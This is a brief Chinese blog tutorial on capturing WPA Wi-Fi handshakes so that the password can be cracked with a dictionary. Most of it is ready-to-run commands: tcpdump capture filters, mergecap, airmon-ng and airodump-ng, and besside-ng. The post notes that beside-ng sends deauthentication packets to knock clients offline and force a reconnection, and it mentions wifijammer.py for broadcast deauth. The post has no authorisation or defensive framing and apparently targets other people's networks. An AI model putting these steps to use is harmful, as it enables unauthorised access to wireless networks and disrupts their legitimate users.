现在大部分人都学精了,然后 WPS 都关了,这就十分尴尬了.

不过我们还是有个老办法,抓握手然后跑字典.

抓握手的话,基本点的方式是用 tcpdump.

tcpdump "ether proto 0x888e and ether host 'bssid'" -I -U -vvv -i en0 -w eapol.cap
tcpdump "type mgt subtype beacon and ether src 'bssid'" -I -c 1 -i en0 -w beacon.cap

其中记得将 bssid 替换为 Wi-Fi 的 bssid.在捕获 eapol 的时候你需要等待 Got 0 变为 Got 4,这样你就抓到了 4-way 的握手,然后我们把它合并为你要跑的 *.cap.

mergecap -a -F pcap -w handshake.cap beacon.cap eapol.cap

handshake.cap 就是我们需要的文件了.

[![photo_2016-06-03_14-35-32](https://oao.moe/wp-content/uploads/2016/06/photo_2016-06-03_14-35-32-300x51.jpg)](https://oao.moe/wp-content/uploads/2016/06/photo_2016-06-03_14-35-32.jpg)
使用 Wireshark 查看 handshake.cap

或者我们可以使用 aircrack-ng. aircrack 套件中你可以直接用 airodump-ng 来抓取.

airmon-ng start wlan0 #打开监听模式
airodump-ng wlan0mon
#可以指定 bssid
airodump-ng wlan0mon --bssid

当然还有高级点的,besside-ng.

besside-ng wlan0mon
besside-ng wlan0mon -b #bssid

besside-ng 会发送 deauth 包让对方的客户端断开连接,他们重新连接的时候,我们就可以抓到 handshake 了.

PS:wifijammer.py 也是这个方法,全局广播 deauth.


Creative Commons License
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.